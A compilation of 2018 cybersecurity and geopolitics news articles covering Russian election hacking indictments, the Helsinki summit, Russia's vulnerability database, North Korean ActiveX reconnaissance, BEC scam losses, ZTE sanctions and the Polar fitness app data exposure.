Russia, which hosted the World Cup from June 14 to July 15 in 11 cities and 12 stadiums, has been repeatedly accused by Western countries of conducting cyber-attacks.

On Friday, 12 Russian military intelligence officers were charged with hacking Hillary Clinton's 2016 presidential campaign and the Democratic Party in a stunning indictment three days before President Donald Trump meets with Putin in Helsinki on Monday.

The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the November 2016 vote and whether any members of Trump's campaign team colluded with Moscow.


Russia's National Vulnerability Database Slow, Incomplete
19.7.18 securityweek BigBrothers

Russia’s national vulnerability database is slow, incomplete and it focuses on security flaws that could pose a threat to the country’s IT systems, according to an analysis conducted by threat intelligence firm Recorded Future.

After analyzing the national vulnerability databases of the United States and China, Recorded Future has decided to take a look at Russia’s database, known as the BDU. The BDU is maintained by the Federal Service for Technical and Export Control of Russia (FSTEC), an agency whose role is to protect state secrets and provide support for counterespionage and counterintelligence missions.

Researchers discovered significant differences both in the number of vulnerabilities and the time it takes to add them to the database, compared to the databases run by China and the United States. For instance, while the US’s NVD stored information on nearly 108,000 security holes, the BDU only documented just over 11,000 flaws in March, when Recorded Future conducted its analysis.

As for the time it takes for a vulnerability to be included in the BDU, the average is 95 days, much more than in the United States (45 days) and China (11 days).

While Russia’s database only covers roughly 10 percent of known vulnerabilities, there are certain pieces of software and certain types of bugs that seem more important to the maintainers of the database.

Software vulnerabilities covered above average in Russia's national vulnerability database

Researchers noticed that the BDU stores information on 61 percent of the vulnerabilities known to have been exploited by Russia-linked advanced persistent threat (APT) groups in their campaigns. This is in contrast to China, whose CNNVD database hides or delays flaws exploited by the country’s intelligence services.

While the vulnerabilities exploited by Russia-linked APTs affect some of the world’s most widely used software, their presence in the vulnerability database suggests that the systems of the Russian government also run these programs, especially since FSTEC’s mission is to protect government systems. This also provides insight into the applications used by the Russian government.

Moreover, Recorded Future points out it’s also possible that hackers sponsored by the Russian military leverage vulnerabilities in the BDU in their operations, or that the military may be obligated to protect the state’s IT systems by providing information on these flaws.

“The public record and available data is not yet sufficient to determine the relationship between FSTEC and Russian state-sponsored cyber operations,” Recorded Future said in its report.

On the other hand, while the BDU covers many vulnerabilities affecting Adobe products, even in this category the database is incomplete. According to researchers, there are over 1,200 Adobe bugs with a CVSS score higher than 8 that are not present in Russia’s database.

So why waste resources on an incomplete and very slow vulnerability database?

A lack of resources could be an explanation, but analysts note that FSTEC has over 1,100 employees, nearly triple compared to the US’s NIST Information Technology Laboratory (ITL), which maintains the country’s NVD.

Another possible scenario is that FSTEC has both an offensive and defensive mission and its database covers vulnerabilities based on competing needs. However, experts believe this theory is not accurate either considering that the agency is not a public service organization, as its main mission is to protect state and critical infrastructure systems and support counter intelligence initiatives.

The most likely scenario, Recorded Future believes, is that the DBU is “simply a baseline for government information systems security and software inspections.”

One of the roles of FSTEC is to review the software of foreign companies that want to sell their products in Russia. This includes firewalls, antiviruses and applications that use encryption.

“FSTEC is a military organization and is publishing ‘just enough’ content to be credible as a national vulnerability database. The Russian government needs vulnerability research as a baseline for FSTEC’s other technical control responsibilities, such as requiring reviews of foreign software,” the threat intelligence firm said.


North Korean Hackers Launch New ActiveX Attacks
19.7.18 securityweek BigBrothers

Watering Hole Attacks Target South Korean Users With ActiveX Exploits

A new series of reconnaissance attacks targeting ActiveX objects has been associated with the North Korean-linked Andariel group, a known branch of the notorious Lazarus Group.

In May, the group was observed exploitnig an ActiveX zero-day vulnerability in a series of attacks on South Korean targets, mainly for reconnaissance purposes. A script injected into compromised websites would identify the visitors’ operating system and browser and check for ActiveX and running plugins from a specific list of ActiveX components if Internet Explorer was detected.

Highly active in recent months, the Andariel group has apparently launched a new reconnaissance attack against South Korean targets, by injecting their code into four other compromised websites. The attack, which was spotted on June 21, attempts to collect different object information than before.

Despite targeting objects it wasn’t targeting before, the newly discovered script is similar to the one used in May, which led Trend Micro to the conclusion that the same group of hackers is behind both campaigns.

Previously, the group collected targeted ActiveX objects on users’ Internet Explorer browser and only launched the zero-day exploit after identifying the right targets.

“Based on this, we believe it’s likely that the new targeted ActiveX objects we found could be their next targets for a watering hole exploit attack,” Trend Micro explains.

The new attack lasted until June 27 and targeted the visitors of a Korean non-profit organization’s website and those of three South Korean local government labor union websites.

The injected script, which had similar obfuscation and structure as the Andariel-linked script found in May, was designed to collect visitor information such as browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects.

According to Trend Micro, the script was attempting to detect two additional ActiveX objects that were not previously targeted, namely one related to a DRM (Digital Rights Management) software from a South Korean Document Protection Security vendor and another related to a South Korea-based voice conversion software company.

The script also included code to connect websocket to localhost. “The voice conversion software has websocket service listening on the local host so the injected script can detect the software by checking if they can establish a connection to ports 45461 and 45462, which the software uses,” Trend Micro explains.

The websocket verification, the security researchers say, could also be performed on Chrome and Firefox, in addition to Internet Explorer, which would suggest that the hackers have expanded their target base, aiming at the software and not just the ActiveX objects.

“Based on this change, we can expect them to start using attack vectors other than ActiveX,” Trend Micro notes.


At Summit, Trump Refuses to Confront Putin on Vote Row
19.7.18 securityweek BigBrothers

President Donald Trump refused to confront Vladimir Putin over meddling in the US election at their first face to face summit, publicly challenging the findings of the US intelligence community and triggering bipartisan outrage at home.

The US and Russian presidents came out of their meeting in Helsinki Monday expressing desire for a fresh start between the world's leading nuclear powers and more talk on global challenges, after discussing an array of issues from Syria, Ukraine and China to trade tariffs and the size of their nuclear arsenals.

There were indications of an arrangement to work together and with Israel to support a ceasefire in southern Syria, suggesting that the US administration is backing off its demand that Moscow's ally Bashar al-Assad step down.

If that is anathema to many in Washington, Trump's apparent concessions to Putin over the election controversy drew stinging condemnation from across the political divide.

Standing alongside the Kremlin boss at a joint news conference, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Hillary Clinton in 2016.

But, insisting he had won the race fair and square, the wealthy property tycoon said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Friday's US indictment of 12 Russian military intelligence agents exploded with embarrassing timing for Trump as he prepared to meet Putin. On Monday, officials said another Russian agent had been arrested for seeking to influence US politics.

But the US leader insisted that his counterpart had delivered a "powerful" denial of any Russian manipulation, and that the investigation by special counsel Robert Mueller was proving a "disaster" for the United States.

In his own interview with Fox, Trump said he was "fascinated" by an offer from Putin for US agents to indirectly grill the indicted Russians by submitting their questions to Russian officials but said Mueller's team "probably won't want to go" to Moscow.

- 'Never interfered' -

Trump again denied any collusion between his campaign and the Kremlin, while Putin insisted: "The Russian state has never interfered and is not planning to interfere in the USA's internal affairs."

As criticism mounted, Trump tweeted from Air Force One on his way home from Finland that he had "GREAT confidence in MY intelligence people".

"However, I also recognize that in order to build a brighter future, we cannot exclusively focus on the past – as the world’s two largest nuclear powers, we must get along."

Angry criticism of his disavowal of his own intelligence agencies came even from within Trump's Republican Party.

Senior Republican Senator John McCain was particularly scathing, saying: "Coming close on the heels of President Trump's bombastic and erratic conduct towards our closest friends and allies in Brussels and Britain, today's press conference marks a recent low point in the history of the American presidency."

Director of National Intelligence Dan Coats distanced himself from his boss, issuing a statement saying the US intelligence community's judgment that Russia interfered in the 2016 election was "clear".

But the top Democrat in the US Senate, Chuck Schumer, tweeted that many Americans can only wonder if "the only possible explanation for this dangerous behaviour is the possibility that President Putin holds damaging information over President Trump."

And former CIA director John Brennan said Trump's behavior at the news conference "rises to & exceeds the threshold of 'high crimes & misdemeanors.' It was nothing short of treasonous."

Putin denied the notion that Russian spy bosses may hold compromising information on Trump, who in his previous business career oversaw the Miss Universe pageant in Moscow in 2013.

"Please get this rubbish out of your heads," the Russian leader said.

In a post-summit interview with Fox News, Putin said US-Russia relations should not be held "hostage" to "internal political games," referring to the Mueller probe.

The two leaders appeared relaxed at the Helsinki news conference, smiling on occasion, in contrast to their sombre demeanour at the start of the day.

Trump, bent on forging a personal bond with the Kremlin chief despite the election allegations, went into the summit blaming the "stupidity" of his predecessors for plunging ties to their present low.

His manner towards Putin was also a contrast to the anger Trump flashed at NATO allies at a combative summit of the alliance in Brussels last week, which critics said would only hearten Putin.

- 'Only the beginning' -

A post-NATO trip to Britain, supposedly America's partner in a "special relationship", was riddled with controversy as well.

In Helsinki, however, Trump was determined to accentuate the positive, as was Putin.

The two leaders met one-on-one for more than two hours, with just their interpreters present, before they were joined by their national security teams.

Many in Washington were agog at Trump's decision to sit alone with Putin, worried about what he might give away to the former KGB spymaster, after previously cosying up to the autocratic leaders of China and North Korea.

But Trump, convinced his unique brand of diplomacy can win over Putin, pressed ahead and looked forward to "having an extraordinary relationship" as the pair sat down to discuss global hotspots.

- 'Foolishness and stupidity' -

Trump began the day by firing a Twitter broadside at his domestic opponents, blaming the diplomatic chill on the election investigation.

"Our relationship with Russia has NEVER been worse thanks to many years of U.S. foolishness and stupidity and now, the Rigged Witch Hunt!" Trump tweeted.

Russia's foreign ministry tweeted in response: "We agree."

In a weekend interview with CBS News, Trump admitted that Russia remains a foe, but he put Moscow on a par with China and the European Union as economic and diplomatic rivals.


Irish Silk Road Suspect Extradited to US: Prosecutors
19.7.18 securityweek BigBrothers

A 30-year-old Irish man accused of working for now defunct "dark web" marketplace Silk Road has been extradited to the United States to face charges in New York, four years after his arrest, prosecutors announced Friday.

Gary Davis, who went by the alias "Libertas," was allegedly a Silk Road administrator in 2013 -- and was paid a weekly salary to carry out duties that included resolving disputes between drug dealers and buyers on the site.

He is charged with one count of conspiracy to distribute narcotics, which carries a maximum sentence of life in prison, one count of conspiracy to commit computer intrusion and one count of conspiracy to commit money laundering.

The Wicklow man, who was arrested in January 2014, appeared before a Manhattan federal court on Friday.

"Thanks to our partner agencies here and abroad, Davis now faces justice in an American court," said Manhattan US Attorney Geoffrey Berman.

Until the FBI shut it down in October 2013, the US government called Silk Road "the most sophisticated and extensive criminal marketplace on the Internet" used by vendors in more than 10 countries in North America and Europe.

Texan mastermind Ross Ulbricht was convicted and sentenced to life in prison in 2015 for running the online enterprise that sold $200 million in drugs worldwide.

Operating under the alias "Dread Pirate Roberts," Ulbricht amassed $13 million in commissions by making the purchase of heroin, cocaine and crystal meth as easy as shopping online at eBay or Amazon, the government said.

His four-week trial was considered a landmark case in the murky world of online crime and government surveillance.


Back in Washington, Trump Under Pressure to Reverse Course on Russia
19.7.18 securityweek BigBrothers

President Donald Trump found himself isolated and under pressure to reverse course Tuesday after publicly challenging the US intelligence conclusion that Russia meddled in the 2016 election during his face-to-face with Vladimir Putin.

At his inaugural summit with the Russian president in Finland, Trump appeared to accept at face value the strongman's denial that Moscow interfered in a bid to undermine the Democrat Hillary Clinton -- a stance that triggered bipartisan outrage at home.

Back in Washington, Trump sounded a defensive note, insisting his meeting with Putin had been "even better" than his one last week with traditional allies NATO -- a testy gathering seen as having badly strained trans-Atlantic ties.

But the US president -- who is expected to speak about the meeting at 2:00 pm (1800 GMT) on Tuesday -- has found precious little support for his decision not to confront Putin, and faced calls even from allies to change tack.

"He has to reverse course immediately and he's gotta get out there as soon as possible before the concrete starts to set on this," former White House communications director Anthony Scaramucci said on CNN.

"Loyalty right now requires you to tell the truth and sit with him and explain to him the optics of the situation, why the optics are bad, the strategy in terms of trying to get along with Vladimir Putin and deploying a strategy of going against the intelligence agency is very bad," Scaramucci said.

Former House speaker and longtime Trump ally Newt Gingrich put it yet more bluntly.

"President Trump must clarify his statements in Helsinki on our intelligence system and Putin," he tweeted as Trump headed home. "It is the most serious mistake of his presidency and must be corrected -- immediately.

Trump's performance at the summit has even come under fire from the hosts at Fox News, usually a reliable defender of the president.

"No negotiation is worth throwing your own people and country under the bus," Fox anchor and Fox & Friends co-host Abby Huntsman -- the daughter of the US ambassador to Russia -- wrote on Twitter.

And former president Barack Obama, who has remained above the political fray since leaving office, appeared to allude to the events of the day before during a rare public appearance Tuesday at which he warned the world had plunged into "strange and uncertain times."

"Strongman politics are ascendant, suddenly, whereby elections and some pretense of democracy are maintained -- the form of it -- but those in power seek to undermine every institution or norm that gives democracy meaning," Obama said in Johannesburg.

- 'Undermine democracy' -

Trump and Putin met for two hours in Helsinki on Monday with only their interpreters present, then held a joint press conference.

Standing alongside the Kremlin boss, Trump acknowledged that his intelligence chiefs believe Russia hacked and leaked Democrats' emails containing politically damaging information about his rival Clinton in 2016.

But, insisting he had won the race fair and square, the Republican said: "I have President Putin, he just said it is not Russia. I will say this: I don't see any reason why it would be."

Special Counsel Robert Mueller's investigation into Russian meddling and possible collusion with the Trump campaign has increasingly put pressure on the White House, and the president -- who regards it as an attack on his legitimacy -- has dubbed it a "witch hunt."

But the investigation continues to progress, resulting in the indictment of 12 Russian military intelligence agents on Friday -- timing that was embarrassing in light of the upcoming summit.

While Trump has faced intense criticism over Helsinki, he is not entirely without defenders.

Republican Senator Rand Paul has given a series of interviews supporting Trump's stance towards Putin, and berating his critics as biased.

"I think the president did a good thing by meeting with Putin and I think it's a mistake for people to try to turn this into a partisan escapade," the Kentucky Republican said on CBS.

Paul's efforts drew praise from Trump, who tweeted: "Thank you @RandPaul, you really get it!"

But the bipartisan consensus has been broadly hostile to Trump's stance -- as the top Republican in Congress, House Speaker Paul Ryan made clear once more at a press conference Tuesday on Capitol Hill.

"We stand by our NATO allies and all those countries who are facing Russian aggression," Ryan said. "Vladimir Putin does not share our interests, Vladimir Putin does not share our values."

"We just conducted a yearlong investigation into Russia's interference in our elections. They did interfere in our elections. It's really clear. There should be no doubt about that," he said.

"Russia is trying to undermine democracy itself."


NIST to Withdraw 11 Outdated Cybersecurity Publications
19.7.18 securityweek BigBrothers

The U.S. National Institute of Standards and Technology (NIST) announced on Tuesday that its Computer Security Division has decided to withdraw eleven outdated SP 800 publications.

NIST’s 800 series Special Publications (SP) focus on cybersecurity and include guidelines, technical specifications, recommendations, and annual reports. These publications are meant to address and support the security and privacy needs of government agencies, but they are often used and referenced by private sector companies.

NIST’s website currently lists over 180 SP 800 publications, including drafts and final versions. Eleven of them, which are now considered out of date, will be withdrawn on August 1, 18, and will not be revised or superseded.

The documents will still be available for historical reference, but their status will be changed from “final” to “withdrawn.”

The following SP 800 publications will be withdrawn, with the reason for withdrawal listed for each document:

● SP 800-13 (October 1995): Telecommunications Security Guidelines for Telecommunications Management Network – describes outdated technologies;

● SP 800-17 (February 1998): Modes of Operation Validation System (MOVS): Requirements and Procedures – validation system is for deprecated algorithms, such as DES and Skipjack;

SP 800-19 (October 1999): Mobile Agent Security – environments and technologies far less complex than what is used today;

SP 800-23 (August 2000): Guidelines to Federal Organizations on Security Assurance and Acquisition/Use of Tested/Evaluated Products – based on outdated laws, regulations and executive directives;

● SP 800-24 (April 2001): PBX Vulnerability Analysis: Finding Holes in Your PBX Before Someone Else Does – does not address newer technologies, such as VOIP;

● SP 800-33 (December 2001): Underlying Technical Models for Information Technology Security – describes a model that pre-dates the Risk Management Framework and Cybersecurity Framework;

● SP 800-36 (October 2003): Guide to Selecting Information Technology Security Products – outdated references and it does not reflect current types of security products;

● SP 800-43 (November 2002): Systems Administration Guidance for Securing Windows 2000 Professional System – Windows 2000 no longer supported;

● SP 800-65 (January 2005): Integrating IT Security into the Capital Planning and Investment Control Process – pre-dates the Cybersecurity Framework and other important SP 800 guidance;

● SP 800-68 Rev. 1 (October 2008): Guide to Securing Microsoft Windows XP Systems for IT Professionals: A NIST Security Configuration Checklist – Windows XP no longer supported;

● SP 800-69 (September 2006): Guidance for Securing Microsoft Windows XP Home Edition: A NIST Security Configuration Checklist – Windows XP no longer supported.


US Lifts Export Ban on Suppliers to China's ZTE
18.7.18 securityweek  BigBrothers

The United States on Friday formally lifted a crippling ban on exports to China's ZTE, rescuing the smartphone maker from the brink of collapse after it was denied key components.

The US Commerce Department said it would continue to monitor the company to prevent further violations of US sanctions on Iran and North Korea.

"While we lifted the ban on ZTE, the Department will remain vigilant as we closely monitor ZTE's actions to ensure compliance with all US laws and regulations," Commerce Secretary Wilbur Ross said in a statement.

But the move to reverse the harsh penalties, made at President Donald Trump's insistence, has left US lawmakers irate. Congress has taken steps to keep the ban in place and accused Trump of rewarding a company which had repeatedly flouted American law, lied to authorities and engaged in espionage.

The about-face to rescue to the company created a stark contrast with the escalating trade war between Washington and Beijing.

The Commerce Department in April banned US companies from supplying ZTE with crucial components, forcing it to halt operations, after officials found further violations even after reaching a settlement in March of last year over the initial complaints.

The company had paid bonuses rather than reprimanding employees involved in illegal activity and created an "elaborate scheme" to deceive US officials and obstruct justice, US officials said.

But as a favor to Chinese President Xi Jinping, Trump ordered Commerce to ease the penalties on ZTE.

In an agreement struck last month, Washington agreed to lift the export ban if ZTE paid an additional $1 billion fine -- beyond the $892 million penalty imposed in 2017.

The company also was required to replace its board of directors, retain outside monitors and put $400 million in escrow to cover any future violations -- a final step it took this week.

In a statement this week, Senator Mark Warner of Virginia, the senior Democrat on the Select Committee on Intelligence, lambasted the reversal, saying the US military and spy agencies had branded ZTE an "ongoing threat" to US national security.

"This sweetheart deal not only ignores these serious issues, it lets ZTE off the hook for evading sanctions against Iran and North Korea with a slap on the wrist," Warner said.


BEC Scam Losses Top $12 Billion: FBI
18.7.18 securityweek  BigBrothers

The losses and potential losses reported as a result of business email compromise (BEC) and email account compromise (EAC) scams exceed $12 billion globally, according to an alert published last week by the FBI.

The report is based on data collected by the FBI’s Internet Crime Complaint Center (IC3), international law enforcement and financial institutions between October 2013 and May 18. The amounts represent both money that was actually lost by victims and money they could have lost had they taken the bait.

BEC scams, which involve sending requests for fund transfers and personally identifiable information from hijacked business email accounts, have been observed in 50 U.S. states and 150 countries, with money being sent to 115 countries.

The top destinations for money generated by BEC scams are Asian banks in China and Hong Kong, but a significant number of schemes involve financial organizations in the U.K., Mexico and Turkey.

According to the FBI, more than 78,000 complaints have been made globally between October 2013 and May 18, with over 41,000 victims reported in the United States. Targeted individuals and businesses lost or could have lost $12.5 billion, nearly $3 billion of which in the U.S. Losses increased by 136% between December 2016 and May 18.

The number of non-U.S. victims known to the FBI is 2,565, with losses totaling over $670 million.

In comparison, the FBI’s previous report on BEC scams, which covered the period between October 2013 and December 2016, said there had been 40,203 incidents globally with exposed losses totaling over $5.3 billion.

In its recent 2017 Internet Crime Report, the FBI said IC3 received over 15,000 BEC and EAC complaints last year, reporting losses of $675 million.

The law enforcement agency highlighted that the real estate sector continues to be increasingly targeted. Victims include law firms, title companies, real estate agents, sellers, and buyers.

In scams targeting this sector, the fraudsters use spoofed emails on behalf of real estate transaction participants and instruct recipients to transfer money into fraudulent accounts.

“Based on victim complaint data, BEC/EAC scams targeting the real estate sector are on the rise,” the FBI said. “From calendar year 2015 to calendar year 2017, there was over an 1100% rise in the number of BEC/EAC victims reporting the real estate transaction angle and an almost 2200% rise in the reported monetary loss. May 18 reported the highest number of BEC/EAC real estate victims since 2015, and September 2017 reported the highest victim loss.”

BEC scam losses in real estate sector

The topic of BEC scams and how the threat can be prevented using human-powered intelligence was covered recently in a SecurityWeek column by Josh Lefkowitz, CEO of business risk intelligence firm Flashpoint.

“BEC underscores why even the most technically sophisticated cyber defenses aren’t always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security—it requires humans to understand the threat,” Lefkowitz said.


12 Russian Intelligence Officers Indicted for Hacking U.S. Democrats
18.7.18 securityweek  BigBrothers

Twelve Russian intelligence officers were indicted by a US grand jury on Friday -- just three days before President Donald Trump is scheduled to meet with Russia's Vladimir Putin -- for interfering in the November 2016 presidential election.

The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the 2016 vote and whether any members of Trump's campaign colluded with Moscow.

The indictment accuses members of Russia's military intelligence agency known as the GRU of carrying out "large-scale cyber operations" to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein, who announced the indictment at a press conference in Washington, said "there's no allegation in this indictment that any American citizen committed a crime."

Rosenstein said "the conspirators corresponded with several Americans during the course of the conspiracy through the internet."

However, "there's no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers," he said.

Rosenstein also stressed that "there's no allegation that the conspiracy changed the vote count or affected any election result."

Rosenstein said he briefed Trump about the indictment before Friday's announcement and that the timing was determined by "the facts, the evidence, and the law."

The deputy attorney general's press conference came as Trump was meeting Queen Elizabeth II and just three days before his meeting with Putin in Helsinki.

- Calls to cancel Putin meeting -

Senator Chuck Schumer, the Democratic Senate minority leader, immediately called on Trump to cancel the Putin talks.

"These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win," Schumer said in a statement.

"President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won't interfere in future elections," he said.

Speaking earlier Friday, before the indictments were announced, Trump said he would ask Putin about the allegations of Russian election meddling.

"I will absolutely, firmly ask the question, and hopefully we'll have a good relationship with Russia," he told a joint press conference with British Prime Minister Theresa May.

But he simultaneously denounced the Mueller investigation as a "rigged witch hunt," and said he has been "tougher on Russia than anybody."

"We have been extremely tough on Russia," Trump said.

The US president recalled that 60 intelligence officers were expelled from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

Russia has denied any involvement in the attack and rejected accusations that it interfered in the US presidential election in a bid to bring about the defeat of Democrat Hillary Clinton.

Rosenstein said 11 of the Russians indicted Friday were charged with "conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.

"One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections," he added.

"The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016," the deputy attorney general said.

"They also hacked into the computer networks of a congressional campaign committee and a national political committee."


Departing Apple Engineer Stole Autonomous Car Tech: FBI
18.7.18 securityweek  BigBrothers

An ex-Apple engineer on Monday was charged with stealing secrets from a hush-hush self-driving car technology project days before he quit to go to a Chinese startup.

Xiaolang Zhang was in custody for stealing trade secrets from the Apple project, according to a copy of the criminal complaint posted online.

The charge is punishable by 10 years in prison and a $250,000 fine.

"Apple takes confidentiality and the protection of our intellectual property very seriously," the California-based internet titan said in response to an AFP query.

"We're working with authorities on this matter and will do everything possible to make sure this individual and any other individuals involved are held accountable for their actions."

Zhang was hired by Apple in December of 2015 to be part of a team developing hardware and software for self-driving vehicles, a project that was a "closely-guarded secret," according to the complaint filed by the FBI.

Zhang took paternity leave in the month of April, going with his family to China.

Upon his return to Apple at the end of April, he told a supervisor he was quitting to return to China to be near his ailing mother.

Zhang mentioned he planned to go work for a Chinese self-driving vehicle startup called Xiaopeng Motors, or XMotors, in Guangzhou, according to the complaint.

The supervisor thought Zhang "evasive" and brought in an Apple product security team, which had Zhang turn in all company devices and walked him off campus, according to the filing.

Apple security found that Zhang's activity on the company network surged "exponentially" in the days before he returned from paternity leave.

Zhang did searches of confidential databases, and downloaded technical files, the criminal complaint said.

Documents downloaded by Zhang included some on topics such as "prototypes," according to the case against him.

Apple also had closed-circuit camera recording of Zhang going into autonomous driving tech team labs late on a Saturday night while he was on paternity leave, according to the filing.

Zhang later admitted to taking circuit boards and a Linux server from the hardware lab, and to transferring some Apple files to his wife's computer, the FBI said in the complaint.

Zhang was "voluntarily terminated" from Apple in early March, and FBI agents searched his home in June as part of their investigation.

Zhang told the FBI at that time he was working at XMotors offices in Silicon Valley, according to the complaint.

Zhang was heading to China with a "last-minute round-trip ticket" when FBI agents arrested him at an airport in the Silicon Valley city of San Jose, the filing said.


Outdated DoD IT Jeopardizes National Security: Report
18.7.18 securityweek  BigBrothers

Failure to Modernize Legacy DoD Systems is Putting U.S. National Security in Jeopardy, Report Claims

In a new study titled 'Innovation Imperative: The Drive to Modernize DoD', Meritalk queried 150 federal IT managers working in Department of Defense (DoD) organizations. The stated objective was "to understand the state of their IT infrastructure and applications." This was to include levels of satisfaction, an indication of where missions are being met or missed, and what should be done next.

In fact, this report is solely about DoD IT managers' attitude towards cloud migration -- which is perhaps unsurprising since the survey was underwritten by AWS and Red Hat.

The results confirm a strong belief that cloud is the way forward -- and perhaps the only way for the U.S. military to maintain an advantage over the world's other super powers: China and increasingly Russia. For example, 80% of the respondents say the DoD needs to improve the use of cloud to maintain the military’s technical advantage and support mission success; and 81% say accelerating DoD’s adoption of cloud is critical.

86% of respondents said that failing to modernize legacy DoD systems is putting U.S. national security in jeopardy.

The increasing use of artificial intelligence and big data analytics by the military, the need for more efficient data sharing between agencies, and the power to transcribe and translate massive amounts of recorded voice in almost real time can only be served by the power and flexibility of the cloud.

PentagonRespondents to the survey specifically see DoD cloud adoption important for big data analytics (85%), electronic warfare (83%), shared services (82%), DevOps (81%), AI (77%), IoT (73%), machine learning (72%) and blockchain (61%). But this understanding is not new to the DoD.

The Joint Enterprise Defense Infrastructure (JEDI) initiative is a plan for the DoD to acquire its own commercial cloud infrastructure suitable to hold DoD data at all classification levels, and available to any organization in DoD. It is a massive project spread over a ten-year ordering period, and thought to have a budget of around $10 billion over that timeframe.

It is believed that the DoD's preference is to award the project to a single provider; and it is equally believed that AWS is the frontrunner. Smaller existing cloud providers would lose out, and have been lobbying for a multi-provider approach. Microsoft, Google and IBM are also rumored to be interested in bidding for the project.

There is little mention of JEDI within the Meritalk survey. However, 51% of the respondents said they believe that a single-vendor cloud solution has more pros than cons. Sixty-three percent said that talk about JEDI has had "a positive impact on the pace of their organization’s IT modernization efforts"; and "72% feel utilizing multiple cloud vendors would increase the complexity of their organization’s system integrations."

The Meritalk survey, underwritten by AWS and Red Hat, offers strong support for the DoD's single supplier JEDI preference, where AWS (most probably backed by Red Hat software) is the frontrunner.

But regardless of who wins the JEDI provider contract, the survey also demonstrates that DoD IT managers are ready to increase their migration to the cloud. More than 50% of the respondents would recommend moving 50% of their current data to the cloud (13% would move 'the vast majority' of their data). They are unlikely -- and in some cases for reasons of national security unable -- to adopt a cloud-only strategy.

This will set the DoD on a path directly parallel to that faced by commercial enterprises today -- to what extent should existing infrastructures and data be migrated to the cloud, how can it be achieved, and how do you secure it. The only primary difference is that DoD already knows which cloud; that is, the JEDI cloud.

"The survey shows that the interest and promise of the cloud is well recognized, but the DoD would benefit from the lessons being learned right now by large private enterprises going through the same processes," Ken Spinner, VP of field engineering at Varonis told SecurityWeek. "Private industry, which is often recognized for its agility and embrace of new technologies, still largely works with a hybrid mix of cloud and on-premises systems and storage."

"One thing is certain," agrees Rick Moy, head of marketing at Acalvio: "hybrid networks, or cloud and on-premises." Both agree that adoption of JEDI -- or any other cloud solution -- will present the DoD organizations with both challenges and opportunities.

"There’s no easy button and the cloud is not without risks," says Spinner. "Another concern, and perhaps the weakest link, are the defense contractors that access confidential intelligence as part of their daily workload. It’s far too tempting for a few bad actors to breach a system and attempt to steal data -- the cloud needs to be protected just like on-premises systems and data. Another challenge will be to ensure that the security capabilities people currently have with on-prem solutions are available and tested with both pure cloud solutions and hybrid solutions."

But Moy adds the possibility of 'starting over'. "“I would argue that a move to cloud represents a fresh opportunity to build in better security and advanced monitoring capabilities," he told SecurityWeek: "ones that we may have overlooked in on-premises deployments. For instance, unified policy, access controls, deception, logging and monitoring, and so on."

The JEDI project shows that the DoD hierarchy is already set on a cloud future; and the Meritalk survey shows that individual DoD IT managers are ready for the challenge. "As DoD knows," concludes the Meritalk report, "cloud isn’t the final destination -- but it sets the foundation for necessary innovation, collaboration, and next-generation technologies like big data analytics, shared services, AI, and electronic warfare. Agencies must keep their eyes on the future and consider cloud in terms of broader IT modernization efforts government-wide."


Fitness App Revealed Data on Military, Intelligence Personnel
12.7.18 securityweek  BigBrothers

Mobile fitness app Polar has suspended its location tracking feature after security researchers found it had revealed sensitive data on military and intelligence personnel from 69 countries.

The revelation on the application from Finnish-based app Polar Flow comes months after another health app, Strava, was found to have showed potentially sensitive information about US and allied forces around the world.

Security researchers in the Netherlands said Sunday they were able to find data on some 6,000 individuals including military personnel from dozens of countries and employees of the FBI and National Security Agency.

The disclosure illustrates the potential security risks of using fitness apps which can track a person's location, and which may be "scraped" for espionage.

"With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning," security researcher Foeke Postma said in a blog post Sunday after an investigation with the Dutch news organization De Correspondent.

"We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer's identity."

The investigation found detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea, the researchers said.

Polar said in a statement it was suspending the app's feature that allowed users to share data, while noting that any data made public was the result of users who opted in to location tracking.

"It is important to understand that Polar has not leaked any data, and there has been no breach of private data," the statement said.

It said the location tracking feature "is used by thousands of athletes daily all over the world to share and celebrate amazing training sessions."

According to De Correspondent, only about two percent of Polar users chose to share their data, but that nonetheless allowed anyone to discover potentially sensitive data from military or civilian personnel.

"We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea," the report said.

In January, the Pentagon said it was reviewing its policies on military personnel use of fitness application after Strava's map showed a series of military bases in Iraq as well as sites in Afghanistan.


Polar fitness app broadcasted sensitive data of intelligence and military personnel
11.7.18 securityaffairs BigBrothers

The Mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel.
A new privacy incident involved Fitness application and military. this time the Mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel from 69 countries.

This is the second incident in a few months, in January experts discovered that military worldwide have publicly shared online their exercise routes recorded through the fitness tracker Strava revealing the fitness sessions conducted inside or near military bases.

During the weekend, Dutch security experts revealed they were able to find data on some 6,000 individuals including military personnel from dozens of countries and FBI and National Security Agency personnel.

According to an investigation by the news website Bellingcat and the Dutch news agency De Correspondent, the fitness devices were leaking data belonging to the military or intelligence officials who could be exploited by a threat actors to spy on them.

“With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning,” explained the security researcher Foeke Postma that investigated the case with the Dutch news outlet De Correspondent.

